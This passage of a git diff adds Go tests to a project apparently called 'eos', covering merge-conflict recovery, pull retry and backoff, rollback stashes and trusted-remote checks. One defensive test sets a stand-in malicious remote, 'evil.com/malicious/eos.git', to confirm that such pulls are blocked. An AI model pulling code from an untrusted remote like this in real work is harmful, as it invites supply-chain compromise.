+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("feature change\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "feature")
+
+ // Create conflicting change on main
+ runGitTestCmd(t, repoA, "checkout", "master")
+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("main change\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "main change")
+
+ // Attempt merge (will fail with conflicts)
+ cmd := exec.Command("git", "-C", repoA, "merge", "feature")
+ _ = cmd.Run() // Expected to fail
+
+ hasConflicts, files, err := HasMergeConflicts(rc, repoA)
+ require.NoError(t, err)
+ require.True(t, hasConflicts)
+ require.Contains(t, files, "file.txt")
+}
+
+// TestRecoverFromMergeConflicts_AbortsSuccessfully verifies that
+// RecoverFromMergeConflicts can abort an in-progress merge.
+func TestRecoverFromMergeConflicts_AbortsSuccessfully(t *testing.T) {
+ rc := testutil.TestContext(t)
+ baseDir := t.TempDir()
+
+ repoA := filepath.Join(baseDir, "repoA")
+ require.NoError(t, os.MkdirAll(repoA, 0o755))
+ runGitTestCmd(t, repoA, "init")
+ runGitTestCmd(t, repoA, "config", "user.email", "test@example.com")
+ runGitTestCmd(t, repoA, "config", "user.name", "Test")
+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("base\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "base")
+
+ runGitTestCmd(t, repoA, "checkout", "-b", "feature")
+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("feature\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "feature")
+
+ runGitTestCmd(t, repoA, "checkout", "master")
+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("main\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "main")
+
+ cmd := exec.Command("git", "-C", repoA, "merge", "feature")
+ _ = cmd.Run()
+
+ // Verify conflicts exist
+ hasConflicts, _, err := HasMergeConflicts(rc, repoA)
+ require.NoError(t, err)
+ require.True(t, hasConflicts)
+
+ // Recover should succeed
+ err = RecoverFromMergeConflicts(rc, repoA)
+ require.NoError(t, err)
+
+ // Should be clean now
+ hasConflicts, _, err = HasMergeConflicts(rc, repoA)
+ require.NoError(t, err)
+ require.False(t, hasConflicts, "conflicts should be resolved after recovery")
+}
+
+// TestRecoverFromMergeConflicts_NoopWhenClean verifies recovery is a no-op
+// when there are no conflicts.
+func TestRecoverFromMergeConflicts_NoopWhenClean(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ err := RecoverFromMergeConflicts(rc, repoDir)
+ require.NoError(t, err)
+}
+
+// TestEnsureCleanState_RecoversMergeConflicts verifies the combined
+// check-and-recover function works end-to-end.
+func TestEnsureCleanState_RecoversMergeConflicts(t *testing.T) {
+ rc := testutil.TestContext(t)
+ baseDir := t.TempDir()
+
+ repoA := filepath.Join(baseDir, "repoA")
+ require.NoError(t, os.MkdirAll(repoA, 0o755))
+ runGitTestCmd(t, repoA, "init")
+ runGitTestCmd(t, repoA, "config", "user.email", "test@example.com")
+ runGitTestCmd(t, repoA, "config", "user.name", "Test")
+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("base\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "base")
+
+ runGitTestCmd(t, repoA, "checkout", "-b", "feature")
+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("feature\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "feature")
+
+ runGitTestCmd(t, repoA, "checkout", "master")
+ require.NoError(t, os.WriteFile(filepath.Join(repoA, "file.txt"), []byte("main\n"), 0o644))
+ runGitTestCmd(t, repoA, "add", "file.txt")
+ runGitTestCmd(t, repoA, "commit", "-m", "main")
+
+ cmd := exec.Command("git", "-C", repoA, "merge", "feature")
+ _ = cmd.Run()
+
+ err := EnsureCleanState(rc, repoA)
+ require.NoError(t, err, "EnsureCleanState should recover from merge conflicts")
+}
+
+// TestEnsureCleanState_NoopWhenClean verifies no-op behavior.
+func TestEnsureCleanState_NoopWhenClean(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ err := EnsureCleanState(rc, repoDir)
+ require.NoError(t, err)
+}
+
+// --- ResetToCommit ---
+
+// TestResetToCommit_ResetsSuccessfully verifies git reset works.
+func TestResetToCommit_ResetsSuccessfully(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ // Record initial commit
+ initialCommit := runGitTestCmd(t, repoDir, "rev-parse", "HEAD")
+
+ // Make a second commit
+ require.NoError(t, os.WriteFile(filepath.Join(repoDir, "tracked.txt"), []byte("changed\n"), 0o644))
+ runGitTestCmd(t, repoDir, "add", "tracked.txt")
+ runGitTestCmd(t, repoDir, "commit", "-m", "second")
+
+ secondCommit := runGitTestCmd(t, repoDir, "rev-parse", "HEAD")
+ require.NotEqual(t, initialCommit, secondCommit)
+
+ // Reset to initial
+ err := ResetToCommit(rc, repoDir, initialCommit)
+ require.NoError(t, err)
+
+ currentCommit := runGitTestCmd(t, repoDir, "rev-parse", "HEAD")
+ require.Equal(t, initialCommit, currentCommit)
+}
diff --git a/pkg/git/operations_retry_test.go b/pkg/git/operations_retry_test.go
new file mode 100644
index 000000000..26d063bc8
--- /dev/null
+++ b/pkg/git/operations_retry_test.go
@@ -0,0 +1,338 @@
+package git
+
+import (
+ "errors"
+ "strings"
+ "testing"
+ "time"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/testutil"
+)
+
+// --- Classification tests ---
+
+func TestIsTransientGitPullFailure_AllTransientMarkers(t *testing.T) {
+ // Every entry in transientMarkers must be recognized as transient.
+ for marker, wantReason := range transientMarkers {
+ t.Run(wantReason, func(t *testing.T) {
+ output := "fatal: " + marker
+ got, reason := isTransientGitPullFailure(output)
+ if !got {
+ t.Fatalf("expected transient=true for %q", marker)
+ }
+ if reason != wantReason {
+ t.Fatalf("reason = %q, want %q", reason, wantReason)
+ }
+ })
+ }
+}
+
+func TestIsTransientGitPullFailure_AllPermanentMarkers(t *testing.T) {
+ // Every entry in permanentMarkers must be recognized as permanent.
+ for _, marker := range permanentMarkers {
+ t.Run(marker, func(t *testing.T) {
+ output := "fatal: " + marker
+ got, reason := isTransientGitPullFailure(output)
+ if got {
+ t.Fatalf("expected transient=false for %q", marker)
+ }
+ if reason != "permanent" {
+ t.Fatalf("reason = %q, want %q", reason, "permanent")
+ }
+ })
+ }
+}
+
+func TestIsTransientGitPullFailure_CaseInsensitive(t *testing.T) {
+ got, reason := isTransientGitPullFailure("The Requested URL Returned Error: 502")
+ if !got {
+ t.Fatal("expected transient=true for mixed-case 502")
+ }
+ if reason != "http_502" {
+ t.Fatalf("reason = %q, want http_502", reason)
+ }
+}
+
+func TestIsTransientGitPullFailure_UnknownIsNotTransient(t *testing.T) {
+ got, reason := isTransientGitPullFailure("something completely unexpected happened")
+ if got {
+ t.Fatal("expected transient=false for unknown error")
+ }
+ if reason != "unknown" {
+ t.Fatalf("reason = %q, want %q", reason, "unknown")
+ }
+}
+
+func TestIsTransientGitPullFailure_PermanentTakesPrecedence(t *testing.T) {
+ // If output contains both permanent and transient markers, permanent wins.
+ output := "authentication failed\nrequested url returned error: 502"
+ got, reason := isTransientGitPullFailure(output)
+ if got {
+ t.Fatal("permanent markers should take precedence over transient")
+ }
+ if reason != "permanent" {
+ t.Fatalf("reason = %q, want %q", reason, "permanent")
+ }
+}
+
+func TestIsTransientGitPullFailure_RealGitOutputFormats(t *testing.T) {
+ tests := []struct {
+ name string
+ output string
+ want bool
+ reason string
+ }{
+ {
+ name: "real http 502 from gitea",
+ output: "fatal: unable to access 'https://gitea.cybermonkey.sh/eos.git/': The requested URL returned error: 502",
+ want: true,
+ reason: "http_502",
+ },
+ {
+ name: "real auth failure",
+ output: "remote: Authentication failed for 'https://gitea.cybermonkey.sh/eos.git/'",
+ want: false,
+ reason: "permanent",
+ },
+ {
+ name: "real remote hung up",
+ output: "fatal: the remote end hung up unexpectedly",
+ want: true,
+ reason: "remote_hung_up",
+ },
+ {
+ name: "real dns failure",
+ output: "fatal: unable to access 'https://gitea.example.com/eos.git/': Could not resolve host: gitea.example.com",
+ want: true,
+ reason: "dns_resolution_failure",
+ },
+ {
+ name: "real connection refused",
+ output: "fatal: unable to access 'https://gitea.example.com:3000/eos.git/': Failed to connect to gitea.example.com port 3000: Connection refused",
+ want: true,
+ reason: "connection_refused",
+ },
+ }
+
+ for _, tt := range tests {
+ t.Run(tt.name, func(t *testing.T) {
+ got, reason := isTransientGitPullFailure(tt.output)
+ if got != tt.want {
+ t.Fatalf("isTransientGitPullFailure() = %v, want %v", got, tt.want)
+ }
+ if reason != tt.reason {
+ t.Fatalf("reason = %q, want %q", reason, tt.reason)
+ }
+ })
+ }
+}
+
+// --- Retry behavior tests ---
+
+func TestRunGitPullWithRetry_SucceedsAfterTransientFailures(t *testing.T) {
+ origRun := runGitPullAttempt
+ origSleep := gitPullRetrySleep
+ t.Cleanup(func() {
+ runGitPullAttempt = origRun
+ gitPullRetrySleep = origSleep
+ })
+
+ callCount := 0
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ callCount++
+ if callCount < 3 {
+ return []byte("The requested URL returned error: 502"), errors.New("exit status 1")
+ }
+ return []byte("Already up to date."), nil
+ }
+
+ var sleptDurations []time.Duration
+ gitPullRetrySleep = func(d time.Duration) { sleptDurations = append(sleptDurations, d) }
+
+ out, err := runGitPullWithRetry(testutil.TestContext(t), "/tmp/repo", "main", false)
+ if err != nil {
+ t.Fatalf("runGitPullWithRetry() error = %v", err)
+ }
+ if string(out) != "Already up to date." {
+ t.Fatalf("unexpected output: %q", string(out))
+ }
+ if callCount != 3 {
+ t.Fatalf("attempts = %d, want 3", callCount)
+ }
+ if len(sleptDurations) != 2 {
+ t.Fatalf("sleep count = %d, want 2", len(sleptDurations))
+ }
+ // Verify backoff durations are increasing (base + jitter, so at least base)
+ for i, d := range sleptDurations {
+ minExpected := time.Duration(i+1) * GitPullBaseBackoff
+ if d < minExpected {
+ t.Fatalf("sleep[%d] = %v, want >= %v", i, d, minExpected)
+ }
+ }
+}
+
+func TestRunGitPullWithRetry_DoesNotRetryPermanentFailures(t *testing.T) {
+ origRun := runGitPullAttempt
+ origSleep := gitPullRetrySleep
+ t.Cleanup(func() {
+ runGitPullAttempt = origRun
+ gitPullRetrySleep = origSleep
+ })
+
+ callCount := 0
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ callCount++
+ return []byte("remote: Authentication failed"), errors.New("exit status 1")
+ }
+ gitPullRetrySleep = func(d time.Duration) {
+ t.Fatal("should not sleep on permanent failure")
+ }
+
+ _, err := runGitPullWithRetry(testutil.TestContext(t), "/tmp/repo", "main", false)
+ if err == nil {
+ t.Fatal("expected error for permanent failure")
+ }
+ if callCount != 1 {
+ t.Fatalf("attempts = %d, want 1", callCount)
+ }
+}
+
+func TestRunGitPullWithRetry_ExhaustsAllAttempts(t *testing.T) {
+ origRun := runGitPullAttempt
+ origSleep := gitPullRetrySleep
+ t.Cleanup(func() {
+ runGitPullAttempt = origRun
+ gitPullRetrySleep = origSleep
+ })
+
+ callCount := 0
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ callCount++
+ return []byte("The requested URL returned error: 503"), errors.New("exit status 1")
+ }
+ gitPullRetrySleep = func(d time.Duration) {}
+
+ _, err := runGitPullWithRetry(testutil.TestContext(t), "/tmp/repo", "main", false)
+ if err == nil {
+ t.Fatal("expected error after exhausting all attempts")
+ }
+ if callCount != GitPullMaxAttempts {
+ t.Fatalf("attempts = %d, want %d", callCount, GitPullMaxAttempts)
+ }
+ // Verify error message includes failure history
+ errMsg := err.Error()
+ if !strings.Contains(errMsg, "attempt=1") || !strings.Contains(errMsg, "http_503") {
+ t.Fatalf("error should contain failure history, got: %s", errMsg)
+ }
+}
+
+func TestRunGitPullWithRetry_SucceedsFirstTry(t *testing.T) {
+ origRun := runGitPullAttempt
+ origSleep := gitPullRetrySleep
+ t.Cleanup(func() {
+ runGitPullAttempt = origRun
+ gitPullRetrySleep = origSleep
+ })
+
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ return []byte("Already up to date."), nil
+ }
+ gitPullRetrySleep = func(d time.Duration) {
+ t.Fatal("should not sleep on first-try success")
+ }
+
+ out, err := runGitPullWithRetry(testutil.TestContext(t), "/tmp/repo", "main", true)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if string(out) != "Already up to date." {
+ t.Fatalf("unexpected output: %q", string(out))
+ }
+}
+
+func TestRunGitPullWithRetry_MixedTransientErrors(t *testing.T) {
+ origRun := runGitPullAttempt
+ origSleep := gitPullRetrySleep
+ t.Cleanup(func() {
+ runGitPullAttempt = origRun
+ gitPullRetrySleep = origSleep
+ })
+
+ responses := []struct {
+ output string
+ err error
+ }{
+ {"temporary failure in name resolution", errors.New("exit 1")},
+ {"The requested URL returned error: 502", errors.New("exit 1")},
+ {"Already up to date.", nil},
+ }
+
+ callCount := 0
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ r := responses[callCount]
+ callCount++
+ return []byte(r.output), r.err
+ }
+ gitPullRetrySleep = func(d time.Duration) {}
+
+ out, err := runGitPullWithRetry(testutil.TestContext(t), "/tmp/repo", "main", false)
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if string(out) != "Already up to date." {
+ t.Fatalf("unexpected output: %q", string(out))
+ }
+ if callCount != 3 {
+ t.Fatalf("attempts = %d, want 3", callCount)
+ }
+}
+
+func TestRunGitPullWithRetry_UnknownErrorDoesNotRetry(t *testing.T) {
+ origRun := runGitPullAttempt
+ origSleep := gitPullRetrySleep
+ t.Cleanup(func() {
+ runGitPullAttempt = origRun
+ gitPullRetrySleep = origSleep
+ })
+
+ callCount := 0
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ callCount++
+ return []byte("some weird git internal error"), errors.New("exit status 128")
+ }
+ gitPullRetrySleep = func(d time.Duration) {
+ t.Fatal("should not sleep on unknown error")
+ }
+
+ _, err := runGitPullWithRetry(testutil.TestContext(t), "/tmp/repo", "main", false)
+ if err == nil {
+ t.Fatal("expected error for unknown failure")
+ }
+ if callCount != 1 {
+ t.Fatalf("attempts = %d, want 1 (unknown errors should not retry)", callCount)
+ }
+}
+
+// --- Backoff tests ---
+
+func TestRetryBackoff_IncreasesByAttempt(t *testing.T) {
+ prev := time.Duration(0)
+ for attempt := 1; attempt <= GitPullMaxAttempts; attempt++ {
+ base := time.Duration(attempt) * GitPullBaseBackoff
+ d := retryBackoff(attempt)
+ if d < base {
+ t.Fatalf("attempt %d: backoff %v < base %v", attempt, d, base)
+ }
+ maxExpected := base + GitPullMaxJitter
+ if d > maxExpected {
+ t.Fatalf("attempt %d: backoff %v > max %v", attempt, d, maxExpected)
+ }
+ if d <= prev && attempt > 1 {
+ // This can occasionally fail due to jitter, but base increase
+ // guarantees min(attempt N) > max(attempt N-1) when base > jitter.
+ // With base=2s and jitter=1s, this always holds.
+ t.Logf("warning: attempt %d backoff %v <= attempt %d backoff %v (jitter overlap)", attempt, d, attempt-1, prev)
+ }
+ prev = d
+ }
+}
diff --git a/pkg/git/operations_stash_test.go b/pkg/git/operations_stash_test.go
new file mode 100644
index 000000000..4eb221f4a
--- /dev/null
+++ b/pkg/git/operations_stash_test.go
@@ -0,0 +1,98 @@
+package git
+
+import (
+ "os"
+ "os/exec"
+ "path/filepath"
+ "strings"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/testutil"
+ "github.com/stretchr/testify/require"
+)
+
+func runGitTestCmd(t *testing.T, dir string, args ...string) string {
+ t.Helper()
+ cmd := exec.Command("git", append([]string{"-C", dir}, args...)...)
+ out, err := cmd.CombinedOutput()
+ require.NoErrorf(t, err, "git %v failed: %s", args, strings.TrimSpace(string(out)))
+ return strings.TrimSpace(string(out))
+}
+
+func setupGitRepo(t *testing.T) string {
+ t.Helper()
+ repoDir := t.TempDir()
+ runGitTestCmd(t, repoDir, "init")
+ runGitTestCmd(t, repoDir, "config", "user.email", "eos-tests@example.com")
+ runGitTestCmd(t, repoDir, "config", "user.name", "Eos Tests")
+
+ require.NoError(t, os.WriteFile(filepath.Join(repoDir, "tracked.txt"), []byte("base\n"), 0o644))
+ runGitTestCmd(t, repoDir, "add", "tracked.txt")
+ runGitTestCmd(t, repoDir, "commit", "-m", "initial")
+ return repoDir
+}
+
+func TestCreateRollbackStash_NoChanges(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ stashRef, err := createRollbackStash(rc, repoDir)
+ require.NoError(t, err)
+ require.Empty(t, stashRef)
+}
+
+func TestCreateRollbackStash_UntrackedChanges(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ untrackedPath := filepath.Join(repoDir, "local-notes.txt")
+ require.NoError(t, os.WriteFile(untrackedPath, []byte("keep me\n"), 0o644))
+
+ stashRef, err := createRollbackStash(rc, repoDir)
+ require.NoError(t, err)
+ require.NotEmpty(t, stashRef)
+
+ status := runGitTestCmd(t, repoDir, "status", "--porcelain")
+ require.Empty(t, status, "working tree should be clean after stash")
+ require.NoFileExists(t, untrackedPath, "untracked file should be stashed away")
+
+ runGitTestCmd(t, repoDir, "stash", "apply", stashRef)
+ require.FileExists(t, untrackedPath, "untracked file should be restored after stash apply")
+}
+
+func TestShortRef(t *testing.T) {
+ require.Equal(t, "1234", shortRef("1234"))
+ require.Equal(t, "12345678...", shortRef("1234567890abcdef"))
+ require.Equal(t, "", shortRef(""))
+}
+
+func TestRestoreStash_EmptyRef(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ require.NoError(t, RestoreStash(rc, repoDir, ""))
+}
+
+func TestNormalizeRepositoryOwnershipForSudoUser_NoSudoContext(t *testing.T) {
+ rc := testutil.TestContext(t)
+ repoDir := setupGitRepo(t)
+
+ t.Setenv("SUDO_UID", "")
+ t.Setenv("SUDO_GID", "")
+
+ require.NoError(t, normalizeRepositoryOwnershipForSudoUser(rc, repoDir))
+}
+
+func TestPullWithStashTracking_NoRemoteChangeRestoresStashImmediately(t *testing.T) {
+ rc := testutil.TestContext(t)
+ cr := setupCloneableRepo(t)
+
+ untracked := filepath.Join(cr.LocalRepo, "local-only.txt")
+ require.NoError(t, os.WriteFile(untracked, []byte("local\n"), 0o644))
+
+ changed, stashRef, err := PullWithStashTracking(rc, cr.LocalRepo, "main")
+ require.NoError(t, err)
+ require.False(t, changed)
+ require.Empty(t, stashRef, "stash ref should clear when no code changed")
+ require.FileExists(t, untracked, "untracked file should be restored when pull is no-op")
+}
diff --git a/pkg/git/pull_repository_test.go b/pkg/git/pull_repository_test.go
new file mode 100644
index 000000000..d738eddab
--- /dev/null
+++ b/pkg/git/pull_repository_test.go
@@ -0,0 +1,119 @@
+package git
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/testutil"
+ "github.com/stretchr/testify/require"
+)
+
+func TestPullRepository_FetchFirstSkipsStashWhenRemoteUnchanged(t *testing.T) {
+ rc := testutil.TestContext(t)
+ cr := setupCloneableRepo(t)
+
+ untracked := filepath.Join(cr.LocalRepo, "local-only.txt")
+ require.NoError(t, os.WriteFile(untracked, []byte("local\n"), 0o644))
+
+ origRun := runGitPullAttempt
+ t.Cleanup(func() { runGitPullAttempt = origRun })
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ t.Fatal("runGitPullAttempt should not run when fetch proves no update is needed")
+ return nil, nil
+ }
+
+ result, err := PullRepository(rc, cr.LocalRepo, "main", PullOptions{
+ VerifyRemote: true,
+ FailOnMissingHTTPSCredentials: true,
+ TrackRollbackStash: true,
+ FetchFirst: true,
+ })
+ require.NoError(t, err)
+ require.False(t, result.CodeChanged)
+ require.Empty(t, result.StashRef)
+ require.FileExists(t, untracked, "untracked file should remain untouched when remote is unchanged")
+}
+
+func TestPullLatestCode_FailsEarlyWithoutHTTPSCredentials(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+
+ origRun := runGitPullAttempt
+ t.Cleanup(func() { runGitPullAttempt = origRun })
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ t.Fatal("git pull should not start when HTTPS credentials are not configured")
+ return nil, nil
+ }
+
+ err := PullLatestCode(rc, dir, "main")
+ require.Error(t, err)
+ require.Contains(t, err.Error(), "credential.helper")
+}
+
+func TestPullRepository_PullsRemoteChangeAndTracksRollbackStash(t *testing.T) {
+ rc := testutil.TestContext(t)
+ cr := setupCloneableRepo(t)
+
+ // Push a new version
+ cr.pushNewVersion(t, "v2")
+
+ untracked := filepath.Join(cr.LocalRepo, "local-dev-notes.txt")
+ require.NoError(t, os.WriteFile(untracked, []byte("my local notes\n"), 0o644))
+
+ result, err := PullRepository(rc, cr.LocalRepo, "main", PullOptions{
+ VerifyRemote: true,
+ FailOnMissingHTTPSCredentials: true,
+ TrackRollbackStash: true,
+ VerifyCommitSignatures: true,
+ FetchFirst: true,
+ })
+ require.NoError(t, err)
+ require.True(t, result.CodeChanged)
+ require.NotEmpty(t, result.StashRef)
+ require.NoFileExists(t, untracked, "untracked file should stay stashed until rollback/restore")
+
+ require.NoError(t, RestoreStash(rc, cr.LocalRepo, result.StashRef))
+ require.FileExists(t, untracked)
+}
+
+func TestPullRepository_RestoresStashOnPullFailure(t *testing.T) {
+ rc := testutil.TestContext(t)
+ cr := setupCloneableRepo(t)
+
+ untracked := filepath.Join(cr.LocalRepo, "local-dev-notes.txt")
+ require.NoError(t, os.WriteFile(untracked, []byte("my local notes\n"), 0o644))
+
+ origRun := runGitPullAttempt
+ t.Cleanup(func() { runGitPullAttempt = origRun })
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ return []byte("remote: Authentication failed"), os.ErrPermission
+ }
+
+ _, err := PullRepository(rc, cr.LocalRepo, "main", PullOptions{
+ VerifyRemote: true,
+ FailOnMissingHTTPSCredentials: true,
+ TrackRollbackStash: true,
+ })
+ require.Error(t, err)
+ require.FileExists(t, untracked, "stash should be restored when pull fails")
+}
+
+func TestPullRepository_FailsBeforePullForUntrustedRemote(t *testing.T) {
+ rc := newTestRC(t)
+ dir := initTestRepo(t, "https://evil.com/malicious/eos.git")
+
+ origRun := runGitPullAttempt
+ t.Cleanup(func() { runGitPullAttempt = origRun })
+ runGitPullAttempt = func(repoDir, branch string, autostash bool, interactive bool, extraEnv []string) ([]byte, error) {
+ t.Fatal("git pull should not run for an untrusted remote")
+ return nil, nil
+ }
+
+ _, err := PullRepository(rc, dir, "main", PullOptions{
+ VerifyRemote: true,
+ FailOnMissingHTTPSCredentials: true,
+ })
+ require.Error(t, err)
+ require.Contains(t, err.Error(), "SECURITY VIOLATION")
+}
diff --git a/pkg/git/test_helpers_test.go b/pkg/git/test_helpers_test.go
new file mode 100644
index 000000000..8636d5e7f
--- /dev/null
+++ b/pkg/git/test_helpers_test.go
@@ -0,0 +1,66 @@
+package git
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/constants"
+ "github.com/stretchr/testify/require"
+)
+
+// CloneableRepo holds references to a bare remote, seed repo, and local clone
+// for testing git pull operations against a real local git setup.
+type CloneableRepo struct {
+ RemoteBare string // bare repo used as origin
+ SeedRepo string // repo used to push commits to origin
+ LocalRepo string // clone of origin for pull testing
+}
+
+// setupCloneableRepo creates a bare remote, seeds it with one commit, and
+// clones it into a local repo. The remote is automatically added to
+// constants.TrustedRemotes for the duration of the test.
+func setupCloneableRepo(t *testing.T) *CloneableRepo {
+ t.Helper()
+ baseDir := t.TempDir()
+
+ remoteBare := filepath.Join(baseDir, "origin.git")
+ runGitTestCmd(t, baseDir, "init", "--bare", remoteBare)
+
+ seedRepo := filepath.Join(baseDir, "seed")
+ require.NoError(t, os.MkdirAll(seedRepo, 0o755))
+ runGitTestCmd(t, seedRepo, "init")
+ runGitTestCmd(t, seedRepo, "config", "user.email", "eos-tests@example.com")
+ runGitTestCmd(t, seedRepo, "config", "user.name", "Eos Tests")
+ runGitTestCmd(t, seedRepo, "branch", "-M", "main")
+ require.NoError(t, os.WriteFile(filepath.Join(seedRepo, "app.txt"), []byte("v1\n"), 0o644))
+ runGitTestCmd(t, seedRepo, "add", "app.txt")
+ runGitTestCmd(t, seedRepo, "commit", "-m", "seed v1")
+ runGitTestCmd(t, seedRepo, "remote", "add", "origin", remoteBare)
+ runGitTestCmd(t, seedRepo, "push", "-u", "origin", "main")
+
+ localRepo := filepath.Join(baseDir, "local")
+ runGitTestCmd(t, baseDir, "clone", "--branch", "main", remoteBare, localRepo)
+ runGitTestCmd(t, localRepo, "config", "user.email", "eos-tests@example.com")
+ runGitTestCmd(t, localRepo, "config", "user.name", "Eos Tests")
+
+ // Trust the bare repo remote for the duration of the test
+ originalTrusted := append([]string(nil), constants.TrustedRemotes...)
+ constants.TrustedRemotes = append(constants.TrustedRemotes, remoteBare)
+ t.Cleanup(func() { constants.TrustedRemotes = originalTrusted })
+
+ return &CloneableRepo{
+ RemoteBare: remoteBare,
+ SeedRepo: seedRepo,
+ LocalRepo: localRepo,
+ }
+}
+
+// pushNewVersion creates a new commit in the seed repo and pushes it to origin.
+func (cr *CloneableRepo) pushNewVersion(t *testing.T, version string) {
+ t.Helper()
+ require.NoError(t, os.WriteFile(filepath.Join(cr.SeedRepo, "app.txt"), []byte(version+"\n"), 0o644))
+ runGitTestCmd(t, cr.SeedRepo, "add", "app.txt")
+ runGitTestCmd(t, cr.SeedRepo, "commit", "-m", "seed "+version)
+ runGitTestCmd(t, cr.SeedRepo, "push", "origin", "main")
+}
diff --git a/pkg/git/verification.go b/pkg/git/verification.go
index cd11ce2ac..5f07f32ca 100644
--- a/pkg/git/verification.go
+++ b/pkg/git/verification.go
@@ -50,13 +50,15 @@ func VerifyTrustedRemote(rc *eos_io.RuntimeContext, repoDir string) error {
if !constants.IsTrustedRemote(remoteURL) {
logger.Error("SECURITY: Untrusted git remote detected",
zap.String("remote", remoteURL),
- zap.Strings("trusted_remotes", constants.TrustedRemotes))
+ zap.Strings("trusted_hosts", constants.TrustedHosts),
+ zap.Strings("trusted_paths", constants.TrustedRepoPaths))
+
+ trustedList := strings.Join(constants.TrustedRemotes, "\n - ")
return fmt.Errorf("SECURITY VIOLATION: Git remote is not in trusted whitelist\n"+
"Current remote: %s\n"+
- "Trusted remotes:\n"+
- " - %s\n"+
- " - %s\n\n"+
+ "Trusted hosts: %v\n"+
+ "Trusted remotes:\n - %s\n\n"+
"DANGER: An attacker may have modified your git configuration!\n\n"+
"Fix (if you trust this is safe):\n"+
" cd %s\n"+
@@ -64,8 +66,8 @@ func VerifyTrustedRemote(rc *eos_io.RuntimeContext, repoDir string) error {
"If you did not make this change, your system may be compromised.\n"+
"Report to: security@cybermonkey.net.au",
remoteURL,
- constants.PrimaryRemoteHTTPS,
- constants.PrimaryRemoteSSH,
+ constants.TrustedHosts,
+ trustedList,
repoDir,
constants.PrimaryRemoteHTTPS)
}
diff --git a/pkg/git/verification_test.go b/pkg/git/verification_test.go
new file mode 100644
index 000000000..c24248f82
--- /dev/null
+++ b/pkg/git/verification_test.go
@@ -0,0 +1,203 @@
+// pkg/git/verification_test.go
+//
+// Tests for git remote verification and commit signature checks.
+// Unit tests verify the wiring between pkg/constants and pkg/git.
+
+package git
+
+import (
+ "context"
+ "os"
+ "os/exec"
+ "path/filepath"
+ "strings"
+ "testing"
+ "time"
+
+ "github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
+ "go.uber.org/zap/zaptest"
+)
+
+// newTestRC creates a minimal RuntimeContext for tests.
+func newTestRC(t *testing.T) *eos_io.RuntimeContext {
+ t.Helper()
+ ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+ t.Cleanup(cancel)
+ return &eos_io.RuntimeContext{
+ Ctx: ctx,
+ Log: zaptest.NewLogger(t),
+ Timestamp: time.Now(),
+ Component: "test",
+ Command: "test",
+ Attributes: make(map[string]string),
+ }
+}
+
+// initTestRepo creates a temporary git repository with a given remote URL.
+func initTestRepo(t *testing.T, remoteURL string) string {
+ t.Helper()
+ dir := t.TempDir()
+
+ run := func(args ...string) {
+ t.Helper()
+ cmd := exec.Command("git", append([]string{"-C", dir}, args...)...)
+ cmd.Env = append(os.Environ(),
+ "GIT_CONFIG_NOSYSTEM=1",
+ "HOME="+dir,
+ )
+ out, err := cmd.CombinedOutput()
+ if err != nil {
+ t.Fatalf("git %v failed: %v\n%s", args, err, out)
+ }
+ }
+
+ run("init")
+ run("config", "user.email", "test@example.com")
